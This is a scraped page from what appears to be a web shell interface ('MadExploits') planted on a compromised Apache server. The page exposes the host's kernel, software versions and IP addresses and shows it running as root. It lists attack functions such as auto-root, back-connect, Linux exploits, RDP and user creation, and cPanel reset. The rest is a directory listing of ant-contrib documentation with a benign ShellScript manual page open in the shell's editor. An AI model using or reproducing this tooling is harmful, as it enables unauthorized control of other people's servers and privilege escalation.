Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
ant-contrib /
manual /
tasks /
[ HOME SHELL ]
Name
Size
Permission
Action
antcallback_task.html
4.29
KB
-rw-r--r--
antclipse_task.html
15.34
KB
-rw-r--r--
antfetch_task.html
3.96
KB
-rw-r--r--
assert_task.html
5.78
KB
-rw-r--r--
compilewithwalls.html
6.56
KB
-rw-r--r--
for.html
8.64
KB
-rw-r--r--
foreach.html
5.23
KB
-rw-r--r--
forget.html
1.72
KB
-rw-r--r--
get-cookie_task.html
2.65
KB
-rw-r--r--
get-method_task.html
524
B
-rw-r--r--
head-method_task.html
523
B
-rw-r--r--
http-client_type.html
6.16
KB
-rw-r--r--
http-state_type.html
4.81
KB
-rw-r--r--
if.html
3.24
KB
-rw-r--r--
importurl.html
7.63
KB
-rw-r--r--
index.html
365
B
-rw-r--r--
inifile.html
3.17
KB
-rw-r--r--
limit_task.html
4.42
KB
-rw-r--r--
math_task.html
9.92
KB
-rw-r--r--
method_task_common.html
7.26
KB
-rw-r--r--
more_conditions.html
6.54
KB
-rw-r--r--
osfamily.html
1.07
KB
-rw-r--r--
outofdate.html
10.1
KB
-rw-r--r--
pathtofileset.html
2.46
KB
-rw-r--r--
performance_monitor.html
4.36
KB
-rw-r--r--
post-method_task.html
4.13
KB
-rw-r--r--
post_task.html
7.63
KB
-rw-r--r--
propertycopy.html
2.28
KB
-rw-r--r--
propertyregex.html
4.57
KB
-rw-r--r--
propertyselector.html
4.18
KB
-rw-r--r--
relentless.html
4.6
KB
-rw-r--r--
runtarget.html
834
B
-rw-r--r--
server_tasks.html
8.5
KB
-rw-r--r--
shellscript.html
4.16
KB
-rw-r--r--
sortlist.html
4.78
KB
-rw-r--r--
stopwatch_task.html
2.34
KB
-rw-r--r--
switch.html
2.21
KB
-rw-r--r--
throw.html
1.1
KB
-rw-r--r--
timestampselector.html
4.36
KB
-rw-r--r--
toc.html
3.41
KB
-rw-r--r--
trycatch.html
2.75
KB
-rw-r--r--
urlencode.html
2.47
KB
-rw-r--r--
variable_task.html
6.02
KB
-rw-r--r--
verifydesign.html
14.37
KB
-rw-r--r--
verifylegacytutorial.html
4.34
KB
-rw-r--r--
verifynewprojtutorial.html
1.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : shellscript.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=utf-8"> <TITLE>Ant-contrib Tasks: ShellScript</TITLE> <META NAME="GENERATOR" CONTENT="OpenOffice.org 644 (Linux)"> <META NAME="CREATED" CONTENT="20030313;10303100"> <META NAME="CHANGED" CONTENT="20030318;15221000"> </HEAD> <BODY LANG="en-US" DIR="LTR"> <H1>ShellScript</H1> <P>Task definition for the <CODE>shellscript</CODE> task. This task allows the user to execute a script against a particular shell program on a machine. It is an extension of the "exec" task, and as such, supports the same attributes. One can however use "shell" instead of "executable". Also the "command" attribute is not allowed. See the ANT documentation for a description of the <exec> task parameters.</P> <H2>Parameters</H2> <TABLE WIDTH=854 BORDER=1 CELLPADDING=2 CELLSPACING=0> <COL WIDTH=84> <COL WIDTH=670> <COL WIDTH=86> <TR> <TH WIDTH=84> <P>Attribute</P> </TH> <TH WIDTH=670> <P>Description</P> </TH> <TH WIDTH=86> <P>Required</P> </TH> </TR> <TR> <TD WIDTH=84 VALIGN=TOP> <P>shell</P> </TD> <TD WIDTH=670 VALIGN=TOP> <P>The name of the shell executable which is to be executed. This shell must support taking a single parameter whose value is a script file which is to be executed. </P> </TD> <TD WIDTH=86> <P>Yes</P> </TD> </TR> <TR> <TD WIDTH=84 VALIGN=TOP> <P>executable</P> </TD> <TD WIDTH=670 VALIGN=TOP> <P>Same as “shell”</P> </TD> <TD WIDTH=86> <P><BR> </P> </TD> </TR> <TR VALIGN=TOP> <TD WIDTH=84> <P>tmpsuffix</P> </TD> <TD WIDTH=670> <P>The contents of the script are placed in a temporary file. This attribute is the extension to use. <B>note: </B>The value must contain any dots required. This attribute is usefull for using script files with windows </P> </TD> <TD WIDTH=86> <P>No</P> </TD> </TR> <TR VALIGN=TOP> <TD WIDTH=84> <P>inputstring</P> </TD> <TD WIDTH=670> <P>This is placed in the script file.</P> </TD> <TD WIDTH=86> <P>No</P> </TD> </TR> </TABLE> <H2>Nested Text</H2> <P>Any nested text is treated as the contents of the script that is to be executed within the shell. Embedded ant properties will be converted.</P> <H2>Examples</H2> <PRE> <shellscript shell="bash" dir="${src.mib.dir}"> mibgen -i ../include mib.mib -c ${build.gen.dir}/generated.cpp mibgen -i ../include mib.mib -h ${build.gen.dir}/generated.h </shellscript> <shellscript shell="sed" outputproperty="sed.output"> <arg value="-e"/> <arg value="s/FOO/BAR/g"/> FOO bar bar bar FOO bar bar </shellscript> <shellscript shell="cmd.exe" tmpsuffix=".bat"> <arg value="/c"/> <arg value="call"/> echo hello world </shellscript> <shellscript shell="bash" dir="${build.bin.dir}" inputstring="ls -rt | tail -n 1" outputproperty="last.bin.file"/> <shellscript executable="perl"> print STDOUT "Hello World!\n"; </shellscript> <shellscript shell="sh" dir="${thirdparty.dist.dir}/lib"> rm *.so for file in *.0 do x=`echo $file | sed -e's/.0.1.0//'` ln -s $file $x done </shellscript></PRE><P> <BR><BR> </P> <P><B>Warning:</B></P> <P STYLE="margin-left: 0.79in">One should be carefull in using <I>shellscript</I>, as overuse will make your build files difficult to understand, to maintain and to support multiplatform builds. Use of <I>cygwin</I> in a windows environment will help. However one should strive to use the java tasks whereever possible.</P> <PRE STYLE="margin-bottom: 0.2in"> </PRE> <HR> <P ALIGN=CENTER>Copyright © 2003 Ant-Contrib Project. All rights Reserved.</P> </BODY> </HTML>
Close